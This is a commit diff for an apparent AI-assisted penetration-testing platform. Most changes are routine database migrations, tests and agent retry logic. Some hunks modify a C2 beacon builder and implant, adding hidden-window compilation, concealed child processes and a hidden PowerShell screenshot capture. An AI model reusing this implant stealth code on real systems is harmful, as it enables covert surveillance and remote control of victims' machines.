Compare commits

..

10 Commits

Author SHA1 Message Date
公明 4661862a1a Add files via upload 2026-06-11 18:03:09 +08:00
公明 f319a0f243 Add files via upload 2026-06-11 18:01:38 +08:00
公明 15c4802319 Add files via upload 2026-06-11 17:18:58 +08:00
公明 6ffde48b0c Add files via upload 2026-06-11 16:54:36 +08:00
公明 c5e2f0d95d Add files via upload 2026-06-11 16:02:48 +08:00
公明 28a826d5b7 Add files via upload 2026-06-11 15:56:25 +08:00
公明 6365de7018 Add files via upload 2026-06-11 11:50:31 +08:00
公明 2e4bf7197b Add files via upload 2026-06-11 11:48:17 +08:00
公明 ed4ba08163 Add files via upload 2026-06-11 11:46:23 +08:00
公明 8b5e55a673 Add files via upload 2026-06-11 11:44:20 +08:00
22 changed files with 703 additions and 111 deletions
+18 -5
View File
@@ -160,6 +160,18 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
}
f.Close()
// 平台相关辅助源文件(如无窗口子进程)
for _, name := range []string{"proc_hide_windows.go", "proc_hide_unix.go"} {
helperSrc := filepath.Join(b.tmplDir, name+".tmpl")
helperData, readErr := os.ReadFile(helperSrc)
if readErr != nil {
return nil, fmt.Errorf("read helper %s: %w", name, readErr)
}
if writeErr := os.WriteFile(filepath.Join(workDir, name), helperData, 0644); writeErr != nil {
return nil, fmt.Errorf("write helper %s: %w", name, writeErr)
}
}
// 交叉编译
binName := strings.TrimSpace(in.OutputName)
if binName == "" {
@@ -174,15 +186,16 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
return nil, fmt.Errorf("mkdir output: %w", err)
}
absSrcPath, err := filepath.Abs(srcPath)
if err != nil {
return nil, fmt.Errorf("abs source path: %w", err)
}
absBinPath, err := filepath.Abs(binPath)
if err != nil {
return nil, fmt.Errorf("abs output path: %w", err)
}
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath)
ldflags := "-s -w -buildid="
if goos == "windows" {
// 无控制台窗口运行 beacon 本体
ldflags += " -H windowsgui"
}
cmd := exec.Command("go", "build", "-ldflags", ldflags, "-trimpath", "-o", absBinPath, ".")
cmd.Env = append(os.Environ(),
"GOOS="+goos,
"GOARCH="+goarch,
+3 -1
View File
@@ -729,6 +729,7 @@ func runWithTimeout(cmdStr string, timeoutSec int) (string, error) {
timeoutSec = 60
}
cmd := exec.Command(shellByOS(), shellFlag(), cmdStr)
prepareHiddenCmd(cmd)
cwdMu.Lock()
cmd.Dir = currentCwd
cwdMu.Unlock()
@@ -959,7 +960,7 @@ func taskScreenshot() (string, string, string, string) {
b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30)
case "windows":
ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())`
b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30)
b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"%s\"", ps), 30)
default:
return "", "", "", "screenshot not supported on " + runtime.GOOS
}
@@ -1200,6 +1201,7 @@ func taskLoadAssembly(payload map[string]interface{}) (string, string, string, s
cmdArgs = strings.Fields(args)
}
cmd := exec.Command(tmpFile, cmdArgs...)
prepareHiddenCmd(cmd)
cwdMu.Lock()
cmd.Dir = currentCwd
cwdMu.Unlock()
@@ -0,0 +1,9 @@
//go:build !windows
package main
import "os/exec"
func prepareHiddenCmd(cmd *exec.Cmd) {
_ = cmd
}
@@ -0,0 +1,18 @@
//go:build windows
package main
import (
"os/exec"
"syscall"
)
// prepareHiddenCmd 避免子进程弹出控制台窗口(cmd / powershell / 临时 exe 等)。
func prepareHiddenCmd(cmd *exec.Cmd) {
if cmd == nil {
return
}
// 仅用 HideWindow:等价于 CREATE_NO_WINDOW,且 macOS/Linux 交叉编译 Windows 时
// syscall.CREATE_NO_WINDOW 常量不可用。
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
}
+1 -1
View File
@@ -239,7 +239,7 @@ func (db *DB) CountBatchQueues(status, keyword string) (int, error) {
// GetBatchTasks 获取批量任务队列的所有任务
func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) {
rows, err := db.Query(
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY id",
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY rowid ASC",
queueID,
)
if err != nil {
+15 -5
View File
@@ -543,18 +543,28 @@ func (db *DB) UpdateConversationTime(id string) error {
return nil
}
// DeleteConversation 删除对话及其所有相关数据
// DeleteConversation 删除对话及其会话相关数据
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
// - messages(消息)
// - process_details(过程详情)
// - attack_chain_nodes(攻击链节点)
// - attack_chain_edges(攻击链边)
// - vulnerabilities(漏洞)
// - conversation_group_mappings(分组映射)
// 注意:knowledge_retrieval_logs 使用 ON DELETE SET NULL,记录会保留但 conversation_id 会被设为 NULL
// 漏洞记录会保留:vulnerabilities.conversation_id 使用 ON DELETE SET NULL,仅解除与会话的关联。
// 注意:knowledge_retrieval_logs 在删除前会被显式清理。
func (db *DB) DeleteConversation(id string) error {
// 删除对话前补全漏洞来源标签,便于在漏洞库中追溯已删除会话的发现。
_, err := db.Exec(`
UPDATE vulnerabilities
SET conversation_tag = COALESCE(NULLIF(TRIM(conversation_tag), ''), (SELECT title FROM conversations WHERE id = ?))
WHERE conversation_id = ?
`, id, id)
if err != nil {
db.logger.Warn("更新漏洞来源标签失败", zap.String("conversationId", id), zap.Error(err))
}
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
_, err := db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
_, err = db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
if err != nil {
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
// 不返回错误,继续删除对话
@@ -567,7 +577,7 @@ func (db *DB) DeleteConversation(id string) error {
}
db.removeConversationScopedDirs(id)
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id))
db.logger.Info("对话已删除(漏洞记录已保留)", zap.String("conversationId", id))
return nil
}
@@ -0,0 +1,69 @@
package database
import (
"path/filepath"
"testing"
"go.uber.org/zap"
)
func TestDeleteConversationPreservesVulnerabilities(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "vuln-preserve.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
conv, err := db.CreateConversation("vuln source chat", ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
vuln, err := db.CreateVulnerability(&Vulnerability{
ConversationID: conv.ID,
Title: "SQL Injection",
Severity: "high",
Status: "open",
})
if err != nil {
t.Fatalf("CreateVulnerability: %v", err)
}
if err := db.DeleteConversation(conv.ID); err != nil {
t.Fatalf("DeleteConversation: %v", err)
}
got, err := db.GetVulnerability(vuln.ID)
if err != nil {
t.Fatalf("GetVulnerability after delete: %v", err)
}
if got.Title != "SQL Injection" {
t.Fatalf("title = %q, want SQL Injection", got.Title)
}
if got.ConversationID != "" {
t.Fatalf("conversation_id = %q, want empty after conversation delete", got.ConversationID)
}
if got.ConversationTag != "vuln source chat" {
t.Fatalf("conversation_tag = %q, want vuln source chat", got.ConversationTag)
}
}
func TestMigrateVulnerabilitiesConversationFK(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "vuln-fk-migrate.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
if err != nil {
t.Fatalf("vulnerabilitiesConversationFKOnDeleteSetNull: %v", err)
}
if !ok {
t.Fatal("expected vulnerabilities.conversation_id FK to use ON DELETE SET NULL")
}
}
+116 -2
View File
@@ -357,7 +357,7 @@ func (db *DB) initTables() error {
createVulnerabilitiesTable := `
CREATE TABLE IF NOT EXISTS vulnerabilities (
id TEXT PRIMARY KEY,
conversation_id TEXT NOT NULL,
conversation_id TEXT,
conversation_tag TEXT,
task_tag TEXT,
title TEXT NOT NULL,
@@ -371,7 +371,8 @@ func (db *DB) initTables() error {
recommendation TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
project_id TEXT,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
);`
// 创建批量任务队列表
@@ -737,6 +738,9 @@ func (db *DB) initTables() error {
db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err))
// 不返回错误,允许继续运行
}
if err := db.migrateVulnerabilitiesConversationFK(); err != nil {
db.logger.Warn("迁移vulnerabilities会话外键失败", zap.Error(err))
}
if err := db.migrateProjectsTable(); err != nil {
db.logger.Warn("迁移projects相关表失败", zap.Error(err))
@@ -1146,6 +1150,116 @@ func (db *DB) dropProjectFactVersionsTable() error {
return err
}
// migrateVulnerabilitiesConversationFK 将 vulnerabilities.conversation_id 外键改为 ON DELETE SET NULL,删除对话时保留漏洞记录。
func (db *DB) migrateVulnerabilitiesConversationFK() error {
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
if err != nil {
return err
}
if ok {
return nil
}
tx, err := db.Begin()
if err != nil {
return fmt.Errorf("开启事务失败: %w", err)
}
defer func() { _ = tx.Rollback() }()
const createNew = `
CREATE TABLE vulnerabilities_new (
id TEXT PRIMARY KEY,
conversation_id TEXT,
conversation_tag TEXT,
task_tag TEXT,
title TEXT NOT NULL,
description TEXT,
severity TEXT NOT NULL,
status TEXT NOT NULL DEFAULT 'open',
vulnerability_type TEXT,
target TEXT,
proof TEXT,
impact TEXT,
recommendation TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
project_id TEXT,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
);`
if _, err := tx.Exec(createNew); err != nil {
return fmt.Errorf("创建 vulnerabilities_new 失败: %w", err)
}
const copyRows = `
INSERT INTO vulnerabilities_new (
id, conversation_id, conversation_tag, task_tag, title, description,
severity, status, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at, project_id
)
SELECT
id, conversation_id, conversation_tag, task_tag, title, description,
severity, status, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at, project_id
FROM vulnerabilities;`
if _, err := tx.Exec(copyRows); err != nil {
return fmt.Errorf("复制 vulnerabilities 数据失败: %w", err)
}
if _, err := tx.Exec(`DROP TABLE vulnerabilities`); err != nil {
return fmt.Errorf("删除旧 vulnerabilities 表失败: %w", err)
}
if _, err := tx.Exec(`ALTER TABLE vulnerabilities_new RENAME TO vulnerabilities`); err != nil {
return fmt.Errorf("重命名 vulnerabilities 表失败: %w", err)
}
indexes := []string{
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id)`,
}
for _, stmt := range indexes {
if _, err := tx.Exec(stmt); err != nil {
return fmt.Errorf("重建 vulnerabilities 索引失败: %w", err)
}
}
if err := tx.Commit(); err != nil {
return fmt.Errorf("提交 vulnerabilities 外键迁移失败: %w", err)
}
db.logger.Info("vulnerabilities 表已迁移:删除对话时保留漏洞记录")
return nil
}
func vulnerabilitiesConversationFKOnDeleteSetNull(db *sql.DB) (bool, error) {
rows, err := db.Query(`PRAGMA foreign_key_list(vulnerabilities)`)
if err != nil {
return false, err
}
defer rows.Close()
found := false
for rows.Next() {
var id, seq int
var table, from, to, onUpdate, onDelete, match string
if err := rows.Scan(&id, &seq, &table, &from, &to, &onUpdate, &onDelete, &match); err != nil {
return false, err
}
if from == "conversation_id" {
found = true
if !strings.EqualFold(onDelete, "SET NULL") {
return false, nil
}
}
}
if err := rows.Err(); err != nil {
return false, err
}
return found, nil
}
// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段
func (db *DB) migrateVulnerabilitiesTable() error {
columns := []struct {
+4 -4
View File
@@ -138,7 +138,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
_, err := db.Exec(
query,
vuln.ID, vuln.ConversationID, nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
vuln.ID, nullIfEmpty(vuln.ConversationID), nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
vuln.Severity, vuln.Status, vuln.Type, vuln.Target,
vuln.Proof, vuln.Impact, vuln.Recommendation,
vuln.CreatedAt, vuln.UpdatedAt,
@@ -154,7 +154,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
var vuln Vulnerability
query := `
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status,
SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status,
conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
@@ -183,7 +183,7 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
// ListVulnerabilities 列出漏洞
func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) {
query := `
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag,
SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag,
vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
@@ -403,7 +403,7 @@ func (db *DB) GetVulnerabilityFilterOptions() (map[string][]string, error) {
if err != nil {
return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err)
}
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id IS NOT NULL AND conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询会话ID建议失败: %w", err)
}
+26
View File
@@ -637,13 +637,26 @@ func (h *AgentHandler) runRobotEinoSingleWithRetry(
var resultMA *multiagent.RunResult
var errMA error
var transientRunAttempts int
var emptyResponseAttempts int
for {
resultMA, errMA = multiagent.RunEinoSingleChatModelAgent(
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
conversationID, curMsg, curHist, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID),
)
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
taskCtx, conversationID, resultMA, errMA, &emptyResponseAttempts,
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
)
if exhaustedEmpty {
errMA = nil
break
}
if handledEmpty {
continue
}
if errMA == nil {
transientRunAttempts = 0
emptyResponseAttempts = 0
break
}
if handled, _ := h.handleEinoTransientRetryContinue(
@@ -673,14 +686,27 @@ func (h *AgentHandler) runRobotMultiAgentWithRetry(
var resultMA *multiagent.RunResult
var errMA error
var transientRunAttempts int
var emptyResponseAttempts int
for {
resultMA, errMA = multiagent.RunDeepAgent(
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
conversationID, curMsg, curHist, roleTools, progressCallback,
h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID),
)
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
taskCtx, conversationID, resultMA, errMA, &emptyResponseAttempts,
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
)
if exhaustedEmpty {
errMA = nil
break
}
if handledEmpty {
continue
}
if errMA == nil {
transientRunAttempts = 0
emptyResponseAttempts = 0
break
}
if handled, _ := h.handleEinoTransientRetryContinue(
+58
View File
@@ -9,6 +9,8 @@ import (
"cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/multiagent"
"go.uber.org/zap"
)
func (h *AgentHandler) einoRunRetryMaxAttempts() int {
@@ -120,3 +122,59 @@ func (h *AgentHandler) handleEinoTransientRetryContinue(
}
return true, nil
}
// handleEinoEmptyResponseContinue 在 SSE 任务循环内处理「正常结束但无助手正文」;返回 exhausted=true 时由外层按成功结束(保留占位文案)。
// 与临时错误重试一致:仅恢复轨迹并保留本请求原始 user 文案,不向模型注入续跑说明。
func (h *AgentHandler) handleEinoEmptyResponseContinue(
baseCtx context.Context,
conversationID string,
result *multiagent.RunResult,
runErr error,
emptyResponseAttempts *int,
curHistory *[]agent.ChatMessage,
curFinalMessage *string,
segmentUserMessage string,
progressCallback func(eventType, message string, data interface{}),
sendProgress func(msg string, extra map[string]interface{}),
) (handled bool, exhausted bool) {
if !errors.Is(runErr, multiagent.ErrEmptyResponseContinue) {
return false, false
}
maxAttempts := h.einoRunRetryMaxAttempts()
*emptyResponseAttempts++
if *emptyResponseAttempts > maxAttempts {
if h.logger != nil {
h.logger.Warn("eino empty response auto resume exhausted",
zap.String("conversationId", conversationID),
zap.Int("maxAttempts", maxAttempts))
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
return false, true
}
attemptNo := *emptyResponseAttempts
if h.logger != nil {
h.logger.Info("eino empty response, auto resume from trace",
zap.String("conversationId", conversationID),
zap.Int("attempt", attemptNo),
zap.Int("maxAttempts", maxAttempts))
}
if progressCallback != nil {
progressCallback("eino_empty_response_continue", fmt.Sprintf("未捕获到助手正文,正在基于轨迹自动续跑(%d/%d)…", attemptNo, maxAttempts), map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"attempt": attemptNo,
"maxAttempts": maxAttempts,
"resumeKind": "trace_segment",
})
}
h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage)
if sendProgress != nil {
sendProgress("已恢复上下文,正在继续推理…", map[string]interface{}{
"conversationId": conversationID,
"source": "empty_response_continue",
})
}
return true, false
}
+67 -15
View File
@@ -178,6 +178,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
var cumulativeMCPExecutionIDs []string
var transientRunAttempts int
var emptyResponseAttempts int
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
var mainIterationOffset int
@@ -237,9 +238,32 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
}
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, conversationID, result, runErr, &emptyResponseAttempts,
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
)
if exhaustedEmpty {
runErr = nil
transientRunAttempts = 0
timeoutCancel()
break
}
if handledEmpty {
mainIterationOffset += segmentMainIterationMax
transientRunAttempts = 0
timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
h.tasks.UpdateTaskStatus(conversationID, "running")
continue
}
if runErr == nil {
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
transientRunAttempts = 0
emptyResponseAttempts = 0
timeoutCancel()
break
}
@@ -418,21 +442,49 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
return
}
result, runErr := multiagent.RunEinoSingleChatModelAgent(
taskCtx,
h.config,
&h.config.MultiAgent,
h.agent,
h.logger,
prep.ConversationID,
prep.FinalMessage,
prep.History,
prep.RoleTools,
progressCallback,
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
if runErr != nil {
curHist := prep.History
curMsg := prep.FinalMessage
var result *multiagent.RunResult
var runErr error
var transientRunAttempts int
var emptyResponseAttempts int
for {
result, runErr = multiagent.RunEinoSingleChatModelAgent(
taskCtx,
h.config,
&h.config.MultiAgent,
h.agent,
h.logger,
prep.ConversationID,
curMsg,
curHist,
prep.RoleTools,
progressCallback,
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
)
if exhaustedEmpty {
runErr = nil
break
}
if handledEmpty {
continue
}
if runErr == nil {
break
}
if handled, fatalErr := h.handleEinoTransientRetryContinue(
baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
); handled {
continue
} else if fatalErr != nil {
runErr = fatalErr
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
}
+69 -17
View File
@@ -188,6 +188,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
var cumulativeMCPExecutionIDs []string
var transientRunAttempts int
var emptyResponseAttempts int
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
var mainIterationOffset int
@@ -249,9 +250,32 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
}
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, conversationID, result, runErr, &emptyResponseAttempts,
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
)
if exhaustedEmpty {
runErr = nil
transientRunAttempts = 0
timeoutCancel()
break
}
if handledEmpty {
mainIterationOffset += segmentMainIterationMax
transientRunAttempts = 0
timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
h.tasks.UpdateTaskStatus(conversationID, "running")
continue
}
if runErr == nil {
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
transientRunAttempts = 0
emptyResponseAttempts = 0
timeoutCancel()
break
}
@@ -430,23 +454,51 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
})
result, runErr := multiagent.RunDeepAgent(
taskCtx,
h.config,
&h.config.MultiAgent,
h.agent,
h.logger,
prep.ConversationID,
prep.FinalMessage,
prep.History,
prep.RoleTools,
progressCallback,
h.agentsMarkdownDir,
strings.TrimSpace(req.Orchestration),
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
if runErr != nil {
curHist := prep.History
curMsg := prep.FinalMessage
var result *multiagent.RunResult
var runErr error
var transientRunAttempts int
var emptyResponseAttempts int
for {
result, runErr = multiagent.RunDeepAgent(
taskCtx,
h.config,
&h.config.MultiAgent,
h.agent,
h.logger,
prep.ConversationID,
curMsg,
curHist,
prep.RoleTools,
progressCallback,
h.agentsMarkdownDir,
strings.TrimSpace(req.Orchestration),
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
)
if exhaustedEmpty {
runErr = nil
break
}
if handledEmpty {
continue
}
if runErr == nil {
break
}
if handled, fatalErr := h.handleEinoTransientRetryContinue(
baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
); handled {
continue
} else if fatalErr != nil {
runErr = fatalErr
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
}
+1 -1
View File
@@ -1344,7 +1344,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"delete": map[string]interface{}{
"tags": []string{"对话管理"},
"summary": "删除对话",
"description": "删除指定的对话及其所有相关数据(消息、漏洞等)。**此操作不可恢复**。",
"description": "删除指定的对话及其会话数据(消息、攻击链等)。**漏洞记录会保留**,仅解除与会话的关联。**此操作不可恢复**。",
"operationId": "deleteConversation",
"parameters": []map[string]interface{}{
{
+23
View File
@@ -1027,9 +1027,32 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
orchMode, runAccumulatedMsgs, persistTraceSource(args, runAccumulatedMsgs),
lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, false,
)
if shouldEinoEmptyResponseContinue(out, emptyHint, len(runAccumulatedMsgs), baseAccumulatedCount) {
if logger != nil {
logger.Info("eino empty response, ending run segment for handler resume",
zap.String("conversationId", conversationID),
zap.String("orchestration", orchMode),
zap.Int("traceMessages", len(runAccumulatedMsgs)))
}
if progress != nil {
progress("eino_empty_response_continue", "会话已结束但未产生助手正文,正在基于轨迹自动续跑…", map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"resumeKind": "trace_segment",
})
}
return out, ErrEmptyResponseContinue
}
return out, nil
}
func shouldEinoEmptyResponseContinue(out *RunResult, emptyHint string, accumulatedLen, baseCount int) bool {
if out == nil || accumulatedLen <= baseCount {
return false
}
return strings.TrimSpace(out.Response) == strings.TrimSpace(emptyHint)
}
func persistTraceSource(args *einoADKRunLoopArgs, fallback []adk.Message) []adk.Message {
if args != nil && args.ModelFacingTrace != nil {
if snap := args.ModelFacingTrace.Snapshot(); len(snap) > 0 {
@@ -0,0 +1,21 @@
package multiagent
import "testing"
func TestShouldEinoEmptyResponseContinue(t *testing.T) {
t.Parallel()
hint := "(empty hint)"
out := &RunResult{Response: hint}
if !shouldEinoEmptyResponseContinue(out, hint, 3, 1) {
t.Fatal("expected continue when response is empty hint and trace grew")
}
if shouldEinoEmptyResponseContinue(out, hint, 1, 1) {
t.Fatal("expected no continue when trace did not grow")
}
if shouldEinoEmptyResponseContinue(&RunResult{Response: "hello"}, hint, 3, 1) {
t.Fatal("expected no continue when response has content")
}
if shouldEinoEmptyResponseContinue(nil, hint, 3, 1) {
t.Fatal("expected no continue for nil result")
}
}
+4
View File
@@ -9,3 +9,7 @@ var ErrInterruptContinue = errors.New("agent interrupt: continue with user-suppl
// ErrTransientRetryContinue 表示 Run 因 429/网络等临时错误结束,应由 handler 落库轨迹后
// loadHistoryFromAgentTrace 再开下一轮 Run(与 ErrInterruptContinue 同级的「分段续跑」语义)。
var ErrTransientRetryContinue = errors.New("agent transient: retry after persisting trace")
// ErrEmptyResponseContinue 表示 Eino ADK 会话正常结束但未捕获到助手正文,应由 handler 落库轨迹后
// loadHistoryFromAgentTrace 再开下一轮 Run(与 ErrInterruptContinue / ErrTransientRetryContinue 同级)。
var ErrEmptyResponseContinue = errors.New("agent empty response: continue after persisting trace")
+6
View File
@@ -4095,6 +4095,12 @@ header {
word-break: break-word;
}
/* 长过程详情:跳过视口外时间线条目的布局/绘制,减轻大段工具输出时的主线程压力 */
.progress-timeline .timeline-item {
content-visibility: auto;
contain-intrinsic-size: auto 72px;
}
.tool-details {
display: flex;
flex-direction: column;
+4 -2
View File
